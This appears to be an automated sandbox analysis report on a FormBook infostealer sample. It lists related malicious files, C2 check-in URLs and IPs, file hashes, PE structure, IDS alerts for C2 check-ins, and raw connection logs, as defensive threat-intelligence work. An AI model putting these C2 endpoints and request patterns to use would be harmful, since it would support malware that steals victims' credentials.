                                                                                                • www.easyhub.xyz/ur25/?yPJdZZPp=YgFlAXF+PF1M9NVblP9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5ZtMpUZIxGFAPC2bwg==&1bz=ofut_N
                                                                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtfGet hashmaliciousFormBookBrowse
                                                                                                • www.menofthehouse.store/o5gu/?Cz=qg/YE8tbqUGHlX9yn/532/da1RukGVzt5a7itCgYWzzXcdUnknjh6ulO/lFtjuestBs3FA==&bFQ=Y488S8qhX
                                                                                                Ordem_de_compra_#PO358.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.casaalmafurniture.com/ey16/?xZED=gZ0vRgtzCg8Y9BjlioTXXGcpipSfchP6EsC108QsyUWTNpWLZXtls9A70lktVmrR4hUD&E8bHr=NjqDiB6XRrFpUP
                                                                                                J7YKoy7RbeAhnI4.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.easyhub.xyz/ur25/?EtxdAx=YgFlAXEKPlw8g9Iv5/9VwiavCVoYTH5qXsZlKIgMZf+jSBRRmW7+G4eG5aB2qV1zyxkR&JtO=ipj4fvRPCntLCLp
                                                                                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • www.mochibees-wylie.com/ge06/?efip3=hJkx0eH2QAKr/rM6zPsNviUHTBSqNLPfVhgpdMrR1UAGLx2aBw8r3vgSMp7elrAEYXkqhQ==&RfJ0=UP64Xzx04B
                                                                                                SOA_OCT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • www.speedgallery.shop/ro12/?Nj=q7bBtZk2sykpAEyGz2CbGdw5qDscegXZ29U5uCqOLaUnJObHOFuBSIyqgeyI0V5al5lx&sZ=mlbL
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                www.nightoracle.comjU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 103.224.212.210
                                                                                                www.mtauratarnt.comjU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 172.67.210.176
                                                                                                www.robertjamesfineclothing.comjU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 104.247.82.51
                                                                                                shops.myshopify.comREF_03351.docGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                PAGO_72094.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                PI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                • 23.227.38.74
                                                                                                PO-AM2307586.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 23.227.38.74
                                                                                                Quote_Request.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                Orden_de_compra.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                e-dekont.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 23.227.38.74
                                                                                                mDZvZLTjGd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 23.227.38.74
                                                                                                pdf-92837.xlsxGet hashmaliciousUnknownBrowse
                                                                                                • 23.227.38.74
                                                                                                WoDN7Q47dO.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 23.227.38.74
                                                                                                Vdxer5qjIX.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                Order_No_455100.docGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 23.227.38.74
                                                                                                4XiBSHVMK9.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                http://lovekizoar.liveGet hashmaliciousUnknownBrowse
                                                                                                • 23.227.38.74
                                                                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.9100.16087.rtfGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                Ordem_de_compra_#PO358.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                J7YKoy7RbeAhnI4.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                TRELLIAN-AS-APTrellianPtyLimitedAUPAGO_72094.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.215
                                                                                                Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.216
                                                                                                HB-252-23.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.217
                                                                                                SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.212
                                                                                                mDZvZLTjGd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.212.215
                                                                                                SecuriteInfo.com.FileRepMalware.795.18532.exeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.214
                                                                                                SecuriteInfo.com.FileRepMalware.795.18532.exeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.214
                                                                                                http://noblocking.net/wpad.dat?dd877e4571fab8981856b1f281cd158922628783Get hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.215
                                                                                                Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                • 103.224.212.213
                                                                                                3Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.210
                                                                                                jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 103.224.212.210
                                                                                                XP1XNeOXU0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                • 103.224.182.245
                                                                                                http://oopatet.com/javascript/fingerprint/iife.min.jsGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.206
                                                                                                http://oopatet.comGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.16
                                                                                                OwX3rXBIQT.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.212.214
                                                                                                mi1w8A8qUH.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.182.252
                                                                                                DHL-081023.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.182.242
                                                                                                http://www.sciencepub123.com/unsubscribeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.240
                                                                                                Payment_Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.182.242
                                                                                                http://energie-charts.infoGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.220
                                                                                                TRELLIAN-AS-APTrellianPtyLimitedAUPAGO_72094.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.215
                                                                                                Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.216
                                                                                                HB-252-23.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.217
                                                                                                SWIFT_LETTER_A1OzGLOB0NH2.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.212
                                                                                                mDZvZLTjGd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.212.215
                                                                                                SecuriteInfo.com.FileRepMalware.795.18532.exeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.214
                                                                                                SecuriteInfo.com.FileRepMalware.795.18532.exeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.214
                                                                                                http://noblocking.net/wpad.dat?dd877e4571fab8981856b1f281cd158922628783Get hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.215
                                                                                                Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                • 103.224.212.213
                                                                                                3Fip115gvy.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.212.210
                                                                                                jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 103.224.212.210
                                                                                                XP1XNeOXU0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                                • 103.224.182.245
                                                                                                http://oopatet.com/javascript/fingerprint/iife.min.jsGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.206
                                                                                                http://oopatet.comGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.16
                                                                                                OwX3rXBIQT.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.212.214
                                                                                                mi1w8A8qUH.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                • 103.224.182.252
                                                                                                DHL-081023.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.182.242
                                                                                                http://www.sciencepub123.com/unsubscribeGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.182.240
                                                                                                Payment_Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                • 103.224.182.242
                                                                                                http://energie-charts.infoGet hashmaliciousUnknownBrowse
                                                                                                • 103.224.212.220
                                                                                                CLOUDFLARENETUSNew_Order_enquiry.xla.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 172.67.215.45
                                                                                                Purchase_Order_022502_-_0002.xla.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 104.21.45.138
                                                                                                file.exeGet hashmaliciousDjvu, Glupteba, RedLine, SmokeLoader, XmrigBrowse
                                                                                                • 172.67.139.220
                                                                                                REF_03351.docGet hashmaliciousFormBookBrowse
                                                                                                • 104.21.53.135
                                                                                                Purchase_Order_A7.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                • 172.64.151.154
                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.227.38.74
                                                                                                DUrtA5NJvAcOoYZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.159.137.232
                                                                                                Detalle_Productos.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 162.159.135.233
                                                                                                RFQ197539.exeGet hashmaliciousLokibotBrowse
                                                                                                • 172.67.177.101
                                                                                                Ejosu6l7sg.exeGet hashmaliciousScreenConnect Tool, Amadey, Babadeda, Glupteba, LummaC Stealer, Mystic Stealer, RedLineBrowse
                                                                                                • 1.1.1.1
                                                                                                saham.apkGet hashmaliciousIrataBrowse
                                                                                                • 172.67.157.118
                                                                                                https://dotsply.comGet hashmaliciousUnknownBrowse
                                                                                                • 172.66.40.43
                                                                                                http://ws4.eeccking.com/Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.223.181
                                                                                                file.exeGet hashmaliciousDjvu, Glupteba, RedLine, SmokeLoader, XmrigBrowse
                                                                                                • 104.21.65.24
                                                                                                https://ws1.ffaagive.com/Get hashmaliciousUnknownBrowse
                                                                                                • 104.21.80.146
                                                                                                https://steancommunlty.xyz/Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.222.152
                                                                                                http://steamcommcounity.com/Get hashmaliciousUnknownBrowse
                                                                                                • 104.18.42.105
                                                                                                https://bathbimop.live/Get hashmaliciousUnknownBrowse
                                                                                                • 104.18.31.76
                                                                                                https://pub-b9821dd4ea52457ea254d1a23f8aa714.r2.dev/amexm.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.18.2.35
                                                                                                https://co-ms.com/docusign-dseNa3onmicrosoftonline.html?Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.67.206.16
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\GCeHcfCef8.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.4408479725072
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                File name:GCeHcfCef8.exe
                                                                                                File size:832'512 bytes
                                                                                                MD5:841031a37159398b8eebca7bb7eff56b
                                                                                                SHA1:1848cf9917341a151a4cd8c3ff041525a4d075eb
                                                                                                SHA256:0ad9757a6895b3595b4eaa5a71cca88d658a1c21f335b8d3268949d659e27fda
                                                                                                SHA512:703be883819631d73c3ecdaab42b73464b1e81072d68a665d551dcc393d3b2b002bf2929a6a9b1f1b17e6de352458bbffe6a7e24a463fe661549202b7bcf42d7
                                                                                                SSDEEP:12288:TMGI/MtgR/mZRM+BYkElTBtzeACtg1Uf10nhLnxeTLE39oexn3SJ:p1gkZR5+k2Dk10nsL4eexn
                                                                                                TLSH:D605BE6C27340245CA2963B6DCC6BD3423690FB962A5E7CB3DF57DD17A72B20D052A0E
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,sG...............0..@...r......._... ...`....@.. ....................................@................................
                                                                                                Icon Hash:216d554c6451690d
                                                                                                Entrypoint:0x4a5f8a
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0xC947732C [Sun Jan 3 12:35:56 2077 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add al, 00h
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add al, 00h
                                                                                                add eax, dword ptr [eax]
                                                                                                add byte ptr [eax], al
                                                                                                xor byte ptr [eax], al
                                                                                                add byte ptr [eax+0000000Eh], al
                                                                                                dec eax
                                                                                                add byte ptr [eax], al
                                                                                                adc byte ptr [eax], 00000000h
                                                                                                add byte ptr [eax], al
                                                                                                pushad
                                                                                                add byte ptr [eax], al
                                                                                                sbb byte ptr [eax], 00000000h
                                                                                                add byte ptr [eax], al
                                                                                                js 00007F954C911472h
                                                                                                add byte ptr [eax+00000000h], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add al, 00h
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add dword ptr [eax], eax
                                                                                                add dword ptr [eax], eax
                                                                                                add byte ptr [eax], al
                                                                                                nop
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], 00000000h
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add al, 00h
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa5f360x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x26e10.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa450c0x70.text
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xa3f900xa4000False0.8825043468940549data7.772448962895667IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xa60000x26e100x27000False0.23845653044871795data4.423953147799057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xce0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xa61300x267a0Device independent bitmap graphic, 195 x 390 x 32, image size 1521000.23598984771573603
                                                                                                RT_GROUP_ICON0xcc8d00x14data1.1
                                                                                                RT_VERSION0xcc8e40x340data0.4362980769230769
                                                                                                RT_MANIFEST0xccc240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain
                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                192.168.2.1135.186.223.18049714802031412 10/24/23-08:28:29.857367TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.1135.186.223.180
                                                                                                192.168.2.11104.19.157.2349717802031412 10/24/23-08:29:30.721718TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.11104.19.157.23
                                                                                                192.168.2.1123.227.38.7449718802031412 10/24/23-08:29:51.038616TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.1123.227.38.74
                                                                                                192.168.2.113.33.130.19049716802031412 10/24/23-08:29:11.748633TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.113.33.130.190
                                                                                                192.168.2.11104.247.82.5149723802031412 10/24/23-08:31:16.668472TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.11104.247.82.51
                                                                                                192.168.2.11103.224.212.21249713802031412 10/24/23-08:28:09.457640TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.11103.224.212.212
                                                                                                192.168.2.11103.224.212.21049721802031412 10/24/23-08:30:33.279150TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.11103.224.212.210
                                                                                                192.168.2.11104.21.69.17449722802031412 10/24/23-08:30:53.443055TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.11104.21.69.174
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 24, 2023 08:28:09.288037062 CEST4971380192.168.2.11103.224.212.212
                                                                                                Oct 24, 2023 08:28:09.453689098 CEST8049713103.224.212.212192.168.2.11
                                                                                                Oct 24, 2023 08:28:09.453933954 CEST4971380192.168.2.11103.224.212.212
                                                                                                Oct 24, 2023 08:28:09.457639933 CEST4971380192.168.2.11103.224.212.212
                                                                                                Oct 24, 2023 08:28:09.655143976 CEST8049713103.224.212.212192.168.2.11
                                                                                                Oct 24, 2023 08:28:09.655196905 CEST8049713103.224.212.212192.168.2.11
                                                                                                Oct 24, 2023 08:28:09.655271053 CEST4971380192.168.2.11103.224.212.212
                                                                                                Oct 24, 2023 08:28:09.655325890 CEST4971380192.168.2.11103.224.212.212
                                                                                                Oct 24, 2023 08:28:09.820971012 CEST8049713103.224.212.212192.168.2.11
                                                                                                Oct 24, 2023 08:28:29.746941090 CEST4971480192.168.2.1135.186.223.180
                                                                                                Oct 24, 2023 08:28:29.857187033 CEST804971435.186.223.180192.168.2.11
                                                                                                Oct 24, 2023 08:28:29.857265949 CEST4971480192.168.2.1135.186.223.180
                                                                                                Oct 24, 2023 08:28:29.857367039 CEST4971480192.168.2.1135.186.223.180
                                                                                                Oct 24, 2023 08:28:29.965651035 CEST804971435.186.223.180192.168.2.11
                                                                                                Oct 24, 2023 08:28:30.093662977 CEST804971435.186.223.180192.168.2.11
                                                                                                Oct 24, 2023 08:28:30.093682051 CEST804971435.186.223.180192.168.2.11
                                                                                                Oct 24, 2023 08:28:30.093797922 CEST4971480192.168.2.1135.186.223.180
                                                                                                Oct 24, 2023 08:28:30.093877077 CEST4971480192.168.2.1135.186.223.180
                                                                                                Oct 24, 2023 08:28:30.201967955 CEST804971435.186.223.180192.168.2.11
                                                                                                Oct 24, 2023 08:29:10.333281994 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:10.436137915 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:10.436266899 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:11.748632908 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:11.851406097 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:11.853933096 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:11.853954077 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:11.854057074 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:11.858732939 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:11.867748976 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:11.867930889 CEST4971680192.168.2.113.33.130.190
                                                                                                Oct 24, 2023 08:29:11.961117029 CEST80497163.33.130.190192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.618877888 CEST4971780192.168.2.11104.19.157.23
                                                                                                Oct 24, 2023 08:29:30.721451998 CEST8049717104.19.157.23192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.721605062 CEST4971780192.168.2.11104.19.157.23
                                                                                                Oct 24, 2023 08:29:30.721718073 CEST4971780192.168.2.11104.19.157.23
                                                                                                Oct 24, 2023 08:29:30.824203968 CEST8049717104.19.157.23192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.826714993 CEST8049717104.19.157.23192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.826867104 CEST4971780192.168.2.11104.19.157.23
                                                                                                Oct 24, 2023 08:29:30.827660084 CEST8049717104.19.157.23192.168.2.11
                                                                                                Oct 24, 2023 08:29:30.827711105 CEST4971780192.168.2.11104.19.157.23
                                                                                                Oct 24, 2023 08:29:30.929198980 CEST8049717104.19.157.23192.168.2.11
                                                                                                Oct 24, 2023 08:29:50.935843945 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.038419008 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.038539886 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.038615942 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.140892982 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155780077 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155838966 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155880928 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155919075 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155946016 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.155956984 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.155987024 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.156121969 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:29:51.156203032 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.156203032 CEST4971880192.168.2.1123.227.38.74
                                                                                                Oct 24, 2023 08:29:51.258464098 CEST804971823.227.38.74192.168.2.11
                                                                                                Oct 24, 2023 08:30:33.113168955 CEST4972180192.168.2.11103.224.212.210
                                                                                                Oct 24, 2023 08:30:33.278834105 CEST8049721103.224.212.210192.168.2.11
                                                                                                Oct 24, 2023 08:30:33.279048920 CEST4972180192.168.2.11103.224.212.210
                                                                                                Oct 24, 2023 08:30:33.279150009 CEST4972180192.168.2.11103.224.212.210
                                                                                                Oct 24, 2023 08:30:33.469585896 CEST8049721103.224.212.210192.168.2.11
                                                                                                Oct 24, 2023 08:30:33.469654083 CEST8049721103.224.212.210192.168.2.11
                                                                                                Oct 24, 2023 08:30:33.469818115 CEST4972180192.168.2.11103.224.212.210
                                                                                                Oct 24, 2023 08:30:33.474467993 CEST4972180192.168.2.11103.224.212.210
                                                                                                Oct 24, 2023 08:30:33.640151024 CEST8049721103.224.212.210192.168.2.11
                                                                                                Oct 24, 2023 08:30:53.340344906 CEST4972280192.168.2.11104.21.69.174
